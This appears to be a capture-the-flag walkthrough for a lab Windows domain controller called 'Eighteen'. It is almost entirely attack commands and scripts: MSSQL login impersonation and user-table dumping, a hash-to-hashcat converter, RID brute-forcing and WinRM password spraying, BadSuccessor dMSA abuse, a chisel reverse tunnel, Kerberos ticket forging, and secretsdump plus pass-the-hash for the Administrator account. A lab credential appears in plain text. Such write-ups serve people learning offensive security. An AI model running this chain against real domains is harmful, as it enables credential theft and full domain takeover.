# Nmap 7.95 scan initiated Sat Nov 15 21:07:18 2025 as: /usr/lib/nmap/nmap --privileged -sVC -oN nmap/nmap.txt 10.10.11.95
Nmap scan report for 10.10.11.95
Host is up (0.084s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to https://eighteen.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info:
| 10.10.11.95:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2025-11-16T02:07:45+00:00; +7h00m00s from scanner time.
| ms-sql-ntlm-info:
| 10.10.11.95:1433:
| Target_Name: EIGHTEEN
| NetBIOS_Domain_Name: EIGHTEEN
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: eighteen.htb
| DNS_Computer_Name: DC01.eighteen.htb
| DNS_Tree_Name: eighteen.htb
|_ Product_Version: 10.0.26100
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-16T02:03:13
| Not valid after: 2055-11-16T02:03:13
| MD5: 476f:88fc:069f:2737:76b5:2e2e:4779:65a3
|_SHA-1: b34e:6c28:9f94:95eb:fa32:4b7a:311d:5210:c58a:4425
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
access mssql with impacket-mssqlclient kevin / iNa2we6haRj2gaw!
impacket-mssqlclient eighteen.htb/kevin:'iNa2we6haRj2gaw!'@10.10.11.95
# check logins that can be impersonated
enum_impersonate

# impersonate appdev
exec_as_login appdev
# use DATABASE
use financial_planner
# show tables
SELECT name FROM sys.tables;
# Dump user table
SELECT * FROM Users;

we convert password_hash to hashcat format
#!/usr/bin/env python3
import base64
import sys
h = ''.join(sys.argv[1:])
if h is None or len(str(h).strip()) == 0:
print('please provide the hash')
exit(1)
taa = h.split(':')[:-1]
start = len(':'.join(taa) + ':')
# Salt
iterations = h[start:].split('$')[0]
salt = h[start:].split('$')[1]
sha = h[start:].split('$')[2]
salt_base64 = base64.b64encode(salt.encode()).decode()
# Hash
hash_hex = sha
hash_bytes = bytes.fromhex(hash_hex)
hash_base64 = base64.b64encode(hash_bytes).decode()
print(f'{taa[1]}:{iterations}:{salt_base64}:{hash_base64}')
python3 pbkdf2-to-hashcat.py <HASH>

nxc mssql DC01.eighteen.htb -u kevin -p 'iNa2we6haRj2gaw!' --local-auth --rid-brute
we make a user list to burteforce

nxc winrm DC01.eighteen.htb -u users -p '<PASSWORD>' 2>/dev/null

evil-winrm -i eighteen.htb -u 'adam.scott' -p '<PASSWORD>'


Get-BadSuccessorOUPermissions.ps1

Exploiting Delegated Managed Service Accounts (dMSAs)
Delegated Managed Service Accounts expose a significant attack surface when not strictly controlled. Any user with rights to create msDS-DelegatedManagedServiceAccount objects — or generic Create Child permissions on an Organizational Unit — can create a new dMSA. Because object creators inherit full control over everything they generate, an attacker with low privileges can craft a malicious dMSA, retrieve its credentials, and weaponize it for BadSuccessor abuse or full domain compromise. dMSAs are not confined to the protected “Managed Service Accounts” container, making this attack path far more accessible in real-world environments.
# load the script
. ./BadSuccessor.ps1
# execute
BadSuccessor -mode exploit -Path "OU=Staff,DC=eighteen,DC=htb" -Name "mal_DMSA" -DelegatedAdmin "adam.scott" -DelegateTarget "Administrator" -domain "eighteen.htb"

chisel server -p 8000 --socks5 --reverse
./chisel client --fingerprint FINGERPRINT IP:PORT R:1080:socks
#!/bin/bash
ip="$1"
[ -z "$ip" ] && echo "Usage: $0 <IP>" && exit 1
sudo timedatectl set-ntp false
t=$(curl -s -I -k -X OPTIONS "https://$ip:5985/wsman" | grep -i '^Date:' | cut -d' ' -f2-)
[ -z "$t" ] && echo "Failed to get time" && exit 1
sudo date -u --set="$t"
bash sync.sh <IP>
proxychains -q impacket-getST eighteen.htb/adam.scott:<PASSWORD> -impersonate 'mal_DMSA$' -dc-ip <DC-IP> -dmsa -self
export KRB5CCNAME=mal_DMSA\$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache
proxychains -q impacket-getST eighteen.htb/'mal_DMSA$' -k -no-pass -dc-ip <DC-IP> -spn cifs/dc01.eighteen.htb
export KRB5CCNAME=mal_DMSA\$@cifs_dc01.eighteen.htb@EIGHTEEN.HTB.ccache
proxychains -q impacket-secretsdump -k -no-pass dc01.eighteen.htb -just-dc-user Administrator -dc-ip <DC-IP>

evil-winrm -i <target-ip> -u Administrator -H 'HASH'
